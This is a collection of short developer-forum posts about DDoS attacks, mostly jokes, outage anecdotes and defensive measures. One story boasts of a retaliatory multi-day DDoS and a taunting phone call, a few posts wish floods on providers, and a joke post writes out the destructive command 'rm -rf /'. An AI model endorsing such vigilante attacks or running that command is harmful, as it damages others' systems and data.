Developer: We have a problem.
Manager: Remember, there are no such things as problems, only opportunities.
Developer: Well then, we have a DDoS opportunity.

Ahhh DDoS attacks

"The server is flooded!"

"With requests? DDoS?"

"No."

Me: Do you know what DDOS stands for?
New hire: Distributed database operating system.

Want to understand a DDOS attack?
Imagine trying to work while being interrupted every few seconds.. forever.
Just like an open office!

"Knock, Knock",
"Knock, Knock",
"Knock, Knock",
"Who's..."
"Knock, Knock",
"Knock, Knock",
"there?"

- DDoS Atack

1995: Viruses create funny VGA effect
2000: Viruses send SPAM e-mails
2010: Viruses steal credentials
2016: Viruses launch DDoS attacks
2017: Viruses demand ransom
2018: Viruses mine crypto coins

When someone says that he defended ddos attack!

So someone is constantly ddos'ing the privacy/security blog.

Just wondering if they really think that 500 hits a second will bring the site down?!

500 h/s consumes about 0.1 percent CPU and 1mb/s.

At least give me a challenge 😥

The most secure firewall.

Hacking/attack experiences...
I'm, for obvious reasons, only going to talk about the attacks I went through and the *legal* ones I did 😅 😜

Let's first get some things clear/funny facts:
I've been doing offensive security since I was 14-15. Defensive since the age of 16-17. I'm getting close to 23 now, for the record.

First system ever hacked (metasploit exploit): Windows XP.
(To be clear, at home through a pentesting environment, all legal)
Easiest system ever hacked: Windows XP yet again.

Time it took me to crack/hack into today's OS's (remote + local exploits, don't remember which ones I used by the way):
Windows: XP - five seconds (damn, those metasploit exploits are powerful)
Windows Vista: Few minutes.
Windows 7: Few minutes.
Windows 10: Few minutes.
OSX (in general): 1 Hour (finding a good exploit took some time, got to root level easily aftewards. No, I do not remember how/what exactly, it's years and years ago)
Linux (Ubuntu): A month approx. Ended up using a Java applet through Firefox when that was still a thing. Literally had to click it manually xD
Linux: (RHEL based systems): Still not exploited, SELinux is powerful, motherfucker.

Keep in mind that I had a great pentesting setup back then 😊. I don't have nor do that anymore since I love defensive security more nowadays and simply don't have the time anymore.

Dealing with attacks and getting hacked.

Keep in mind that I manage around 20 servers (including vps's and dedi's) so I get the usual amount of ssh brute force attacks (thanks for keeping me safe, CSF!) which is about 40-50K every hour. Those ip's automatically get blocked after three failed attempts within 5 minutes. No root login allowed + rsa key login with freaking strong passwords/passphrases.

linu.xxx/much-security.nl - All kinds of attacks, application attacks, brute force, DDoS sometimes but that is also mostly mitigated at provider level, to name a few. So, except for my own tests and a few ddos's on both those domains, nothing really threatening. (as in, nothing seems to have fucked anything up yet)

How did I discover that two of my servers were hacked through brute forcers while no brute force protection was in place yet? installed a barebones ubuntu server onto both. They only come with system-default applications. Tried installing Nginx next day, port 80 was already in use. I always run 'pidof apache2' to make sure it isn't running and thought I'd run that for fun while I knew I didn't install it and it didn't come with the distro. It was actually running. Checked the auth logs and saw succesful root logins - fuck me - reinstalled the servers and installed Fail2Ban. It bans any ip address which had three failed ssh logins within 5 minutes:
Enabled Fail2Ban -> checked iptables (iptables -L) literally two seconds later: 100+ banned ip addresses - holy fuck, no wonder I got hacked!

One other kind/type of attack I get regularly but if it doesn't get much worse, I'll deal with that :)

Dealing with different kinds of attacks:

Web app attacks: extensively testing everything for security vulns before releasing it into the open.
Network attacks: Nginx rate limiting/CSF rate limiting against SYN DDoS attacks for example.
System attacks: Anti brute force software (Fail2Ban or CSF), anti rootkit software, AppArmor or (which I prefer) SELinux which actually catches quite some web app attacks as well and REGULARLY UPDATING THE SERVERS/SOFTWARE.

So yah, hereby :P

That’s fucking insane.... Probably a double post; sorry in advance... I just have to express my anger and amazement for a second.

Angry that they didn’t use such a high powered DDoS attack against say... Facebook or some shit like that, amazed at the sheer size of that attack...

I kinda wanna touch it.

The feeling when you realize the DDoS attacker is yourself because of some stupid JavaScript bug which resulted in an infinite loop which happens to make requests to your server...

I'm watching TV and I just heard something along the lines of "The files have been wiped from the server and there was no sign of a DDOS attack. Whoever erased those files had a backdoor.".

Someday my toaster is going to have an IP address. A bad automatic firmware update will most likely cause it to get stuck on the bagel setting until I plug a usb key in and reflash the memory.

Grandma's refrigerator will probably get viruses, lock itself and freeze all the food inside, demanding bitcoin before defrosting.

My blender will probably be used in a massive DDoS attack because Ninja's master MAC address list got leaked and the hidden control panel login is admin/admin.

Ovens will burn houses down when people call in to have them preheat on their way home from work.

Correlations between the number of times the lights are turned on and how many times the toilet is flushed will yield recommendations to run the dishwasher on Thursdays because it's simply more energy efficient.

My dog will tweet when he's hungry and my smart watch will recommend diet dog food in real-time because he's really been eating too much lately--"Do you want to setup a recurring order on Amazon fresh?"

Sometimes living in a cave sounds nice...

Probably old but it made my 5 min of mindless scrolling a little more interesting

A human cell has 75MB of DNA information, a sperm cell has half A human cell has 75MB of DNA of it 37.5MB, a milliliter of semen has 100 million sperm cels, on average, a ejaculation lasts 5 seconds and has 2.24 milliliters of Semen.

That means a man is able to produce: 37.5MB x 100,000, 000 x 2.25/5 = 1.687.500,000.000.000 bytes/sec 1,6875 Terabytes/sec;

That means a ovule is able to recive a dDOS attack of 1,6 terabytes per second and only lets one package pass, making it THE BEST FIREWALL IN THE WORLD

It's very much fun to stress test one of your own servers and see how well it handles huge traffic loads 😊

I laughed at how in the movies hacking is portrayed as some person clicking a lot buttons really quickly in a very flashy UI. There's a picture of America and sometimes there's a 3d model rotating for no good reason or a bunch of random numbers floating across the screen. They use random hacking related terms like: backdoor, DDoS...etc in their sentences.

At least they did their research...

found somewhere on insta

Spent 2 hours helping some kid learn python, he ended up using it to make DDoS products. I feel used and ashamed (':

How to advertise... uhm... not the right way!

The 'beschermd tegen anti-ddos' literally translates to 'protected against anti-ddos'

So then I can DdoS the living shit out of that those services and will be protected against the anti DdoS stuff....?! 🤣

Ah, every time I am on VPN, on every single website I have to prove that I am not a robot.

Just because I am using a VPN service to protect my information, that does not mean I am about to fuck the website up or DDoS the shit out of you. I wish the CDN providers would understand that and make our life easier.

I am seriously tired of completing the Google verification. Select the vehicle, bike, sign post, dick, vagina, Mia Khalifa. FUCK OFF

When pandemic hit in 2020 I found myself out of work. Until then I used to have a java based pirate gameserver of a MMORPG as a hobby.

When pandemic hit I noticed that online players count increased from like 70 to 200 without much advertising because purely of people being stuck in home. So i decided to scale and spent 2 years with that. What a wild ride it was.

So i invested a bit in ads, managed to reach around 500 online players, opened my own company and launched a couple other successful spinoffs of that gameserver.

First year it was a goldmine but I was doing 10-14 hour days because I had to take care of everything (web, advertising, payment integrations, player support and also developing the server itself, ddos protections and etc.). I made quite a bit of money, saved for a downpayment for mortgage and got an apartment.

Second year I noticed that there was a lot of competition and online players count dropped, but I double downed on this and invested a lot into the product itself and spent most of the time developing a perfect gameserver that would be the big bang while also maintaining existing ones. Clasic overengineering mistake. As you can guess, I crashed and burned on all levels, never even managed to launch my final project because simply the scope was too big and I had trouble finding decent devs to outsource it to, since it was a very niche gameserver.

In the end I learned a lot especially about my own limits and ownership, now Im back to being a dev but working as a contractor.

I believe having actual business owner experience allows me to have different perspective and I can bring more to the table rather than focusing on crunching tasks.

The school I went to...

Grade 1:
*GTA and minecraft to let student familiarize with cheating command and console

*Student should find and read the damn documentation him/herself about items, mobs and quests in every game. Be self motivated!

Grade 2:
*Contribute to community for myth hunting, map creation and glitch

*Solve personal networking, graphics problem and understanding hardware limitation.

*Solving game compability problem after Windows update

*Introduction to cracking and hacking

Grade 3:
*Motivation to host a game server

*Custom server scripting => start To really code the first time, Perl, python, etc

*Introduction to Linux server and Debian

Grade 4:
*From DDoS to server security

*Server maintenance and GitHub

*Game Server web development

*Motivation into non-gaming discipline by a random YouTube geek

*Set up mincraft with raspberry pi and Arduino

*Switch to Linux or Mac and just dual boot for gaming

Prepared for the real world.
Congratz for the graduation in the Pre-school of Developers (11-14 yrs old) :)

1. Fucking MySQL database clusters.

There's nothing fun about MySQL clusters. Sometimes they start producing deadlock errors for no apparent reason... well, there's probably a reason, but it's never a transparent easy to find reason.

What was even less fun is that those errors took down a Sentry server. When your error log server goes down through ddos from your database messages, it's time to rethink your setup.

2. Wiring up a large factory with $2 arduino clones, each with a $2 esp8266 wifi chip, with various sensors for measuring flow of chemical solutions (I wanted cheap real time monitoring as an early warning system next to periodic sampling).

The scaling issue was getting over 500 streaming wifi signals to work in a 55c moist slightly corrosive atmosphere with concrete and steel everywhere, and getting it all into a single InfluxDB instance for analysis.

So I guess you could say Dyn users got Dynied service when their servers were ddossed...

Badum tiss...

The website for our biggest client went down and the server went haywire. Though for this client we don’t provide any infrastructure, so we called their it partner to start figuring this out.
They started blaming us, asking is if we had upgraded the website or changed any PHP settings, which all were a firm no from us. So they told us they had competent people working on the matter.

TL;DR their people isn’t competent and I ended up fixing the issue.

Hours go by, nothing happens, client calls us and we call the it partner, nothing, they don’t understand anything. Told us they can’t find any logs etc.

So we setup a conference call with our CXO, me, another dev and a few people from the it partner.
At this point I’m just asking them if they’ve looked at this and this, no good answer, I fetch a long ethernet cable from my desk, pull it to the CXO’s office and hook up my laptop to start looking into things myself.

IT partner still can’t find anything wrong. I tail the httpd error log and see thousands upon thousands of warning messages about mysql being loaded twice, but that’s not the issue here.
Check top and see there’s 257 instances of httpd, whereas 256 is spawned by httpd, mysql is using 600% cpu and whenever I try to connect to mysql through cli it throws me a too many connections error.

I heard the IT partner talking about a ddos attack, so I asked them to pull it off the public network and only give us access through our vpn. They do that, reboot server, same problems.

Finally we get the it partner to rollback the vm to earlier last night. Everything works great, 30 min later, it crashes again. At this point I’m getting tired and frustrated, this isn’t my job, I thought they had competent people working on this.

I noticed that the db had a few corrupted tables, and ask the it partner to get a dba to look at it. No prevail.

5’o’clock is here, we decide to give the vm rollback another try, but first we go home, get some dinner and resume at 6pm. I had told them I wanted to be in on this call, and said let me try this time.

They spend ages doing the rollback, and then for some reason they have to reconfigure the network and shit. Once it booted, I told their tech to stop mysqld and httpd immediately and prevent it from start at boot.

I can now look at the logs that is leading to this issue. I noticed our debug flag was on and had generated a 30gb log file. Tail it and see it’s what I’d expect, warmings and warnings, And all other logs for mysql and apache is huge, so the drive is full. Just gotta delete it.

I quietly start apache and mysql, see the website is working fine, shut it down and just take a copy of the var/lib/mysql directory and etc directory just go have backups.

Starting to connect a few dots, but I wasn’t exactly sure if it was right. Had the full drive caused mysql to corrupt itself? Only one way to find out. Start apache and mysql back up, and just wait and see. Meanwhile I fixed that mysql being loaded twice. Some genius had put load mysql.so at the top and bottom of php ini.

While waiting on the server to crash again, I’m talking to the it support guy, who told me they haven’t updated anything on the server except security patches now and then, and they didn’t have anyone familiar with this setup. No shit, it’s running php 5.3 -.-

Website up and running 1.5 later, mission accomplished.

I thought meditation was more like putting myself in “airplane mode”. But in reality it felt more like a DDoS attack!

"I just hacked your website"

Me: Oh really? What did you do?

"Ran DDos attack using this third party website haha"

Me: 😃

In a moment of boredom I decided to pen test the new system I've been writing on the live server. Ran sqlmap but forgot to proxy my connection.

DDOS protection kicked in and blocked the entire offices connection to the server, had to drive home quickly to use my home internet to un-blacklist my office ip. 😂

When somebody started bragging about his superior coding skill then I said that talk is cheap and that I wanted to see code (for some reason, this pissed her off) and then she started to DDoS me :^)

spoiler alert: she got a huge fine for it AND got fired from her job (whose servers she used to perform the DDoS)

Work at a media company that reports political news. The government tries to block, launch DDoS attacks, and send a group of thugs to protest outside the office. How to migrate to Canada again?

OK I'm going write some serious heaps of code, my commits will fucking ddos the repository!

All I need is some tunes to drown out the office noise. Hey this song is quite good. Haha Google suggests my favorite song from 2 years ago, let's give that a try next. Oh I didn't know there was a new album out... hmm but I don't like everything... lets find out which 2 songs are good enough to add to a playlist by skipping aimlessly through it. Come to think of it, this style is not really that great for coding, maybe something with less vocals. Oh I know, I'll see if I can find some postmetal goa triphop electroswing dubpsy remix of that on YouTube, that would be enjoyable. No... I like the original better, although I'm a bit bored with it, maybe there's a similar artist hiding in a corner on Bandcamp, or Soundcloud... hey that's a cool mix, I wonder where that sample is from, lets try to find it...

With the growth of cloud services like AWS and Google Cloud, I feel like the quality of products is going downhill very fast.
Big providers dont care if the customer do stupid things, sends malware, ddos as long as they pay....

Read an article that said "a successful DDoS attack [costs an organization] about $100,000 for every hour the attack lasts, according to security company Cloudflare"

And while I don't doubt the number, it still should read

"...$100,000 for every hour the attack lasts, according to company selling DDoS protection, Cloudflare"

Worst guy I ever worked with was a Bulgarian Web dev that had been flown over to work on a few projects to make deadlines run smoother.

He would get offended if I was ever in another meeting without him and send passive aggressive emails then refuse to contribute.

He would storm off if anyone ever criticised his slow work ethic

He went on other team members desktops without permission, under one instance running a command line ddos that the IPS logged straight away and got that person a stern meeting. The Bulgarian guy said he was using it to "learn".

He would take a camera into restricted areas, take pictures and then argue as to why he couldn't do that when security would stop him.

I squashed a bee on his arm out of reflex, he screamed at me that I'm stupid causing a room of over 500 employees to go silent and stare.

Moral of the story, fk that guy

Lecturer I am a TA for said AT LEAST twice that the summaries should be executive summaries. With introduction, supporting paragraphs, and a conclusion while explaining the assignment in class.

Notice the plural form of paragraphs. WHY THE HOLY HELL am I grading papers that are a paragraph, or don't progress fluidly. Or look like a 4th grader wrote them instead of a college student about to graduate????

It's not that hard.
And if i have to send one more email repeating the requirements one more time including "yes, i will deduct points for bad grammar" the class is getting DDoSed. Idgaf. This is university, people. You should know this. Can confirm i write executive summaries regularly. Bosses want updates.

Going to system engineer interview expecting technical questions. Very nervous.

First 'technical' question "what does DDoS stand for?"
Second "what does LTE mean?"

😐😐😐🙄🙄😏🤣😄😅😃 Gonna nail this interview.

GitHub is down. I'm freaking out. The sky is falling

So my boss is staring a new security oriented product and he asked one of my colleagues to prepare a presentation about the possible attacks on the product.

During the presentation there was a section on DoS attacks. The boss didn't know what DoS was and after a brief explanation, he interrupted the presentation and said DDoS is not a threat because there is no data stolen. This is a webapp.

More that 1K ads 😂😂😂 YouTube...
unreal.

Had the first DDOS battle in my life lads, fuck me that was hard. I somehow managed to block these assholes, and some piece of shit was extorting money out of our business by messaging us in telegram. What a piece of shit.

We got DDoS attacked by some spam bot crawler thing.

Higher ups called a meeting so that one of our seniors could present ways to mitigate these attacks.

- If a custom, "obscure" header is missing (from api endpoints), send back a basic HTTP challenge. Deny all credentials.

- Some basic implementation of rate limiting on the web server

We can't implement DDoS protection at the network level because "we don't even have the new load balancer yet and we've been waiting on that for what... Two years now?" (See: spineless managers don't make the lazy network guys do anything)

So now we implement security through obscurity and DDoS protection... Using the very same machines that are supposed to be protected from DDoS attacks.

It's sad that such a primitive thing as a DDoS attack can bring down a huge chunk of the internet. Well done Dyn for being so unprepared.

Wanting to push the code to remote at 3am and just hit the bed.. Appereantly bitbucket has other plans for me 🤷‍♂️

Also chuckles to them for still running python 2.7 on their systems 😏

Sad story:
User : Hey , this interface seems quite nice
Me : Yeah, well I’m still working on it ; I still haven’t managed to workaround the data limit of the views so for the time limit I’ve set it to a couple of days

Few moments later

User : Why does it give me that it can’t connect to the data?
Me : what did you do ?
User : I tried viewing the last year of entries and compare it with this one

Few comas later

100476 errors generated
False cert authorization
Port closed
Server down
DDOS on its way

Sports commenter at AI vs AI deathmatches.
It would probably go like this:

- UltimateGod the Second launches half of the US nuclear missiles to NorthernEurope!
I guess that's it for the poor bugger.

- WankerBot69 tries to delay its doom by channeling old 4chan archives into a devastating ddos attack. UGtS' logic processe go down for a few nanoseconds... Ugh, that's NASTY! It doesn't even have a mother

- Missiles still going up. Looks like UGtS confused the imperial and metric system just like its predecessor.

- WB69 is now has the upper hand. It just used a SMB exploit and is bow encrypting UGtS's storage.

- UGtS is down. We all hope UltimateGod the third will do better. For now, all hail our catevolent overlord WankerBot69.

- See you next time on Bot Armaggedon folks!

When you realise Stack Overflow has been down but in a whole day of coding you didn't notice it because you didn't need it :O

Ugh I'm getting so owned. Currently having a burst DDOS on a host of ours. It is always at xx:00 and xx:30 for ~2 minutes from ~200++ unique AWS instances (Ip's).

Not long enough to ban them (max 2-3 requests per IP), not general enough to ban them on the type of request.. and the IP's.. yea... It would result banning all the amazon subnets which is also not an option lol.

Now waiting I guess.. I sent an email to amazon

Who has a DDOS attack story they want to share ? Dyn put up the good fight today... DDOS attacks can be incredibly difficult to deal with ... Internet of Things devices makes this an even more complicated situation. Outside of calling Prolexic, any vets have some good stories ?

Lads, this DDoS attack on DYN is must be getting pretty bad, the Department of Homeland security just launched an emergency investigation into the source and apparently Amazon has started being interrupted

Hi lil puppies what's your problem?

*proxy vomits*

Have you eaten something wrong....

*proxy happily eats requests and answers correctly*

Hm... Seems like you are...

*proxy vomits dozen of requests at once*

... Not okay.

Ok.... What did u you get fed you lil hellspawn.

TLS handshake error.

Thousands. Of. TLS. Handshake. Errors.

*checking autonomous system information*

Yeah... Requests come from same IP or AS. Someone is actively bombing TLS requests on the TLS terminator.

Wrong / outdated TLS requests.

Let's block the IP addresses....

*Pats HAProxy on the head*

*Gets more vomit as a thank you no sir*

I've now added a list of roughly 320 IP adresses in 4 h to an actively running HAProxy in INet as some Chinese fuckers seemingly find it funny to DDOS with TLS 1.0... or Invalid HTTP Requests... Or Upgrade Headers...

Seriously. I want a fucking weekend you bastards. Shove your communism up your arse if you wanna have some illegal fun. ;)

It started with the customer calling and saying they were experiencing some delays in our system. I talked to a 3rd party and they confirmed that messages between our systems would suddenly stop. We talked several times and I spent the whole day investigating and found nothing. Then at about 7 in the evening I get a mail from the customer who says the problems stopped when the ddos attack was over..... WHAT FUCKING DDOS ATTACK!?!?

//little Story of a sys admin

Wondered why a Server on my Linux Root couldn't build a network connection, even when it was running.

Checked iptables and saw, that the port of the Server was redirected to a different port.

I never added that rule to the firewall. Checked and a little script I used from someone else generated traffic for a mobile game.

OK beginn the DDoS Penetration. Over 10 Gbit/s on some small servers.

Checked Facebook and some idiot posted on my site:
Stop you little shithead or I will report you to the police!!!

Checked his profile page and he had a small shitty android game with a botnet.

Choose one:
1. let him be
2. Fuck him up for good

Lets Sudo with 2.

I scaled up my bandwith to 25 Gbit/s and found out that guys phone number.

Slowly started to eat away his bandwith for days. 3 days later his server was unreachable.

Then I masked my VoIP adress and called him:

Me: Hi, you know me?
He: No WTF! Why are you calling me.
Me: I love your're game a lot, I really love it.
He: What's wrong with you? Who are you?
Me: I'm teach
He: teach?
Me: Teach me lesson
He: Are you crazy I'm hanging up!
Me: I really love you're game. I even took away all your bandwith. Now you're servers are blocked, you're game banned on the store.
He: WHAT, WHAT? (hearing typing)

Me: Don't fuck with the wrong guys. I teached you a lesson, call me EL PENETRATO

He: FUCK Fuck Fuck you! Who are you???!!! I'm going to report you!
Me: How?
He: I got you're logs!
Me: Check it at Utrace...
He: Holy shit all around the world

Me: Lemme Smash Bitch
*hung up*

I wrote an app (took all morning until now) that tells me which shows and movies Amazon removed from Prime...

I forget why I wanted this... was it just to screw with Amazon because they rejected me....

The app is also going to tell me what movies/shows were added because they can't fucking sort them in chronological order by release date. I don't want movies from pre-1990s that were recently added...

Yes I could search for them manually but it's too fuckin tedious, gotta turn on like 10 filtering options...

And maybe I just want to run mini-DDOS attacks on their servers...

Niantic need to hire a bunch of us a d some sysadmins, oh and some anti DDOS experts 😂

We upgraded to Dyn Managed DNS last month, now we're down with the DDoS attack! If we didn't upgrade from their standard plan, we would be online still 😂

Damn hackers! Within the course of a week, the internet of my country has been DDOS-attacked three times! Last week the attacks came from Russia or China". Yesterday they came from Russia and Ukraina. Is this a part of the Russian military exercises Zapad 17? Well, when an important part of the infrastructure is down and thousands of civilians are affected, it's for real and not an exercise.

A few days ago Aruba Cloud terminated my VPS's without notice (shortly after my previous rant about email spam). The reason behind it is rather mundane - while slightly tipsy I wanted to send some traffic back to those Chinese smtp-shop assholes.

Around half an hour later I found that e1.nixmagic.com had lost its network link. I logged into the admin panel at Aruba and connected to the recovery console. In the kernel log there was a mention of the main network link being unresponsive. Apparently Aruba Cloud's automated systems had cut it off.

Shortly afterwards I got an email about the suspension, requested that I get back to them within 72 hours.. despite the email being from a noreply address. Big brain right there.

Now one server wasn't yet a reason to consider this a major outage. I did have 3 edge nodes, all of which had equal duties and importance in the network. However an hour later I found that Aruba had also shut down the other 2 instances, despite those doing nothing wrong. Another hour later I found my account limited, unable to login to the admin panel. Oh and did I mention that for anything in that admin panel, you have to login to the customer area first? And that the account ID used to login there is more secure than the password? Yeah their password security is that good. Normally my passwords would be 64 random characters.. not there.

So with all my servers now gone, I immediately considered it an emergency. Aruba's employees had already left the office, and wouldn't get back to me until the next day (on-call be damned I guess?). So I had to immediately pull an all-nighter and deploy new servers elsewhere and move my DNS records to those ASAP. For that I chose Hetzner.

Now at Hetzner I was actually very pleasantly surprised at just how clean the interface was, how it puts the project front and center in everything, and just tells you "this is what this is and what it does", nothing else. Despite being a sysadmin myself, I find the hosting part of it insignificant. The project - the application that is to be hosted - that's what's important. Administration of a datacenter on the other hand is background stuff. Aruba's interface is very cluttered, on Hetzner it's super clean. Night and day difference.

Oh and the specs are better for the same price, the password security is actually decent, and the servers are already up despite me not having paid for anything yet. That's incredible if you ask me.. they actually trust a new customer to pay the bills afterwards. How about you Aruba Cloud? Oh yeah.. too much to ask for right. Even the network isn't something you can trust a long-time customer of yours with.

So everything has been set up again now, and there are some things I would like to stress about hosting providers.

You don't own the hardware. While you do have root access, you don't have hardware access at all. Remember that therefore you can't store anything on it that you can't afford to lose, have stolen, or otherwise compromised. This is something I kept in mind when I made my servers. The edge nodes do nothing but reverse proxying the services from my LXC containers at home. Therefore the edge nodes could go down, while the worker nodes still kept running. All that was necessary was a new set of reverse proxies. On the other hand, if e.g. my Gitea server were to be hosted directly on those VPS's, losing that would've been devastating. All my configs, projects, mirrors and shit are hosted there.

Also remember that your hosting provider can terminate you at any time, for any reason. Server redundancy is not enough. If you can afford multiple redundant servers, get them at different hosting providers. I've looked at Aruba Cloud's Terms of Use and this is indeed something they were legally allowed to do. Any reason, any time, no notice. They covered all their bases. Make sure you do too, and hope that you'll never need it.

Oh, right - this is a rant - Aruba Cloud you are a bunch of assholes. Kindly take a 1Gbps DDoS attack up your ass in exchange for that termination without notice, will you?

Successful Ddos on NASA.

You just knew the DDOS attack that impacted Twitter, SoundCloud, Spotify, Netflix, Reddit, Disqus, PayPal... Would not have a chance to slow down devRant! Guaranty @dfox has a world class resilient infrastructure built to circumvent and to scale.

If I spray the shit out of this on something, do I DDoS that thing? 🤔

Gotham...

why, oh God, why do you have a scene in SE01 E17 at 9:20 min into the episode, where

J.Gordon uses reading glasses to a screen of an old B/W TV and magically is able to read a logo brand of a jacket.

How did the glasses add hundreds of more pixels to the resolution behind them.

This has ruined it for me, not watching now. Even Mission Impossible where they say "use DDOS to take over their systems" is better than this.

Oh great. I just DDoS'ed a service issued by the government by doing two parallel SOAP requests with a fricking 4 year old MacBook.

I love doing crawlers to test stuff. Client wanted me to crawl his page for certain errors.... seems i ddossed them

Identified the origin of the DDoS attack. Apparently, the person was just hopping through 3 IPs so looked like a targeted attack likely from a competitor. I sent the logs with incident notification to the abuse@hostprovider.com to ask them to suspend them.

Got a prompt response but took them a week to suspend this.

We were a very small team and had to stop everything to fix this-iptables and firewall etc.

We had not even launched the product and was still under development.

I’m fairly new to maintaining my own webservers. For the past week the servers (two of them) kept crashing constantly.

After some investigation I figured it was due to someone running a script trying to get ssh access.

I learned about fail2ban, DOS and DDOS attacks and had quite a fight configuring it all since I had 20 seconds on average between the server shutdowns and had to use those 20 second windows to configure fail2ban bit by bit.

Finally after a few hours it was up and running on both servers and recognized 380 individual IPs spamming random e-mail / password combos.

I fet relieved seeing that it all stopped right after fail2ban installation and thought I was safe now and went to sleep.

I wake up this morning to another e-mail stating that pinging my server failed once again.

I go back to the logs, worried that the attack became more sophisticated or whatever only to see that the 06:25 cronjob is causing another fucking crash. I can’t figure out why.

Fuck this shit. I’m setting another cronjob to restart this son of a bitch at 06:30.

I’m done.

Hey, we need a service to resize some images. Oh, it’ll also need a globally diverse cache, with cache purging capabilities, only cache certain images in the United States, support auto scaling, handle half a petabyte of data , but we don’t know when it’ll be needed, so just plan on all of it being needed at once. It has to support a robust security profile using only basic HTTP auth, be written in Java, hosted on-prem, and be fully protected from ddos attacks. It must be backwards compatible with the previous API we use, but that’s poorly documented, you’ll figure it out. Also, it must support being rolled out 20% of the way so we can test it, and forget about it, and leave two copies of our app in production.

You can re-use the code we already have for image thumbnails even though it’s written in Python, caches nothing and is hosted in the cloud. It should be easy. This guy can show you how it all works.

need halpers!!! does nu one know java# ???¡ iM trYinG to console.log my ddos but it's getting a assembl3r err3r! i runned the cmd rm -rf / but windows say command not founded! pls help! wanna be 1337 ¡!!!

DONT do production stuff on friday afternoon. This friday evening we had an issue on production and just wanted to do a quick fix. The fix resulted in a ddos attack that we accidentally started on our servers in an IoT project. We contacted all customers' devices and asked them for response at the same time. Funny thing is that the devices are programmed to retry if a request fails until it is successful. We ended up with 4 hours downtime on production, servers were running again at 11pm.

Seems like Snapchat is having a DDoS opportunity right now.

So the football world-cup tip app I'm using with some mates got hit by a DDoS attack yesterday.
The only question I have is who the FUCK DDoS'es a motherfucking tip-app?! What the hell is there to gain?! It doesn't even involve money, just tipping for the hell of it!

I get an email about an hour before I get into work: Our website is 502'ing and our company email addresses are all spammed! I login to the server, test if static files (served separately from site) works (they do). This means that my upstream proxy'd PHP-FPM process was fucked. I killed the daemon, checked the web root for sanity, and ran it again. Then, I set up rate limiting. Who knew such a site would get hit?

Some fucking script kiddie set up a proxy, ran Scrapy behind it, and crawled our site for DDoS-able URLs - even out of forms. I say script kiddie because no real hacker would hit this site (it's minor tourism in New Jersey), and the crawler was too advanced for joe shmoe to write. You're no match for well-tuned rate-limiting, asshole!

I went to uni for CompSci with knowing no prior knowledge.

In my first year of uni I created a DigitalOcean droplet to host an SQL server. I didn't change the root password or disable password login out of convenience and as I didn't think anyone would be able to find the IP address to be able to hack it.

Within 3 hours DigitalOcean had locked my account for using my droplet to send DDoS attacks. Support contacted me to ask what was going on. I knew nothing at the time so I was a bit 🤷‍♂️.

And that's when I learned the importance of changing your root password.

So, these guys came to me at work, asking if I knew how the "Low Orbit Scanner" worked...
I said: "no, what's that?"
They said: "It's that tool used for DDoS attacks"
So I replied: "Oh you mean Low Orbit Ion Cannon"
them: "yea that, you know how it works?"
me: "ye, but what do you want to use it for?"
them: "just want to learn how it works"
me: "you download it, run it then fill out the things?"
them: "but I tried it and it doesn't take out the server I tried"
me: "Means your PC is to much of a filthy casual, buy a new one"
them: "can't you help us getting it more effective"
me: "yes, but I rather not end up in jail... I have a job and a clean document..."

The looks of their faces, love to see that disappointment of my colleagues when I say (or atleast hint): "go figure it out yourself"

I went to a medical party this weekend. For about ten hours my girls' radar was DDoS! :D

When you own a game server and you get ddos and your network is down and server is not up your problem is not that its down its that you cant fucking watch netflix...#hateddos

Looks like a standard DOS Injection-In-The-Middle type of attack.

Either CloudFlare itself has decided to join the fun of attacking my DNS server, or somebody is just spoofing their IP in the UDP packets.
Crap, my ipset script is basically useless now, since the real source could be from anywhere :(

Any suggestions on what could I do to make this attack stop? It's not causing any real issues (at least for now), but it's still annoying as hell.
Get fucked, stupid skiddie who keeps manually changing the ip source in his script

Would you DDoS that projector?

Saw this sent into a Discord chat today:

"Warning, look out for a Discord user by the name of "shaian" with the tag #2974. He is going around sending friend requests to random Discord users, and those who accept his friend requests will have their accounts DDoSed and their groups exposed with the members inside it becoming a victim as well. Spread the word and send this to as many discord servers as you can. If you see this user, DO NOT accept his friend request and immediately block him. Discord is currently working on it. SEND THIS TO ALL THE SERVERS YOU ARE IN. This is IMPORTANT: Do not accept a friend request from shaian#2974. He is a hacker.

Tell everyone on your friends list because if somebody on your list adds one of them, they'll be on your list too. They will figure out your personal computer's IP and address, so copy & paste this message where ever you can. He is going around sending friend requests to random discord users, and those who accept his requests will have their accounts and their IP Addresses revealed to him. Spread the word and send this to as many discord servers as you can. If you see this user, DO NOT accept his friend request and immediately block him. Saw this somewhere"

I was so angry I typed up an entire feature-length rant about it (just wanted to share my anger):

"1. Unless they have access to Discord data centres or third-party data centres storing Discord user information I doubt they can obtain the IP just by sending friend requests.

2. Judging by the wording, for example, 'copy & paste this message where ever you can' and 'Spread the word and send this to as many discord servers as you can. If you see this user, DO NOT accept his friend request and immediately block him.' this is most likely BS, prob just someone pissed off at that user and is trying to ruin their reputation etc.. Sentences equivalent to 'spread the word' are literally everywhere in this wall of text.

3. So what if you block the user? You don't even have their user ID, they can change their username and discrim if they want. Also, are you assuming they won't create any alts?

4. Accounts DDoSed? Does the creator of this wall of text even understand what that means? Wouldn't it be more likely that 'shaian' will be DDoSing your computer rather than your Discord account? How would the account even be DDoSed? Does that mean DDoSing Discord's servers themselves?

5. If 'shaian' really had access to Discord's information, they wouldn't need to send friend requests in order to 'DDoS accounts'. Why whould they need to friend you? It doesn't make sense. If they already had access to Discord user IP addresses, they won't even have to interact with the users themselves. Although you could argue that they are trolling and want to get to know the victim first or smth, that would just be inefficient and pointless. If they were DDoSing lots of users it would be a waste of time and resources.

6. The phrase 'Saw this somewhere' at the end just makes it worse. There is absolutely no proof/evidence of any kind provided, let along witnesses.

How do you expect me to believe this copypasta BS scam? This is like that 'Discord will be shutting down' scam a while back.

Why do people even believe this? Do you just blindly follow what others are doing and without thinking, copy and paste random walls of text?

Spreading this false information is pointless and harmful. It only provides benefits to whoever started this whole thing, trying to bring down whoever 'shaian' is.

I don't think people who copy & paste this sort of stuff are ready to use the internet yet.

Would you really believe everything people on the internet tell you?

You would probably say 'no'.

Then why copy & paste this? Do you have a reason?

Or is it 'just because of 'spread the word''?

I'm just sick of seeing people reposting this sort of stuff

People who send this are probably like the people who click 'Yes' to allow an app to make changes in the User Account Control window without reading the information about the publisher's certificate, or the people who click 'Agree' without actually reading the terms and conditions."

A site I manage in my spare time with a couple thousand normal users was getting attacked by a Chinese botnet. All the requests were coming from only two subnets. Easy to block. Feels like this was only the vanguard. Prelude to the real attack. I'm thinking about moving the site to its own server, so it won't affect my other sites. There at least if it gets kneeled, it'll only be that site.

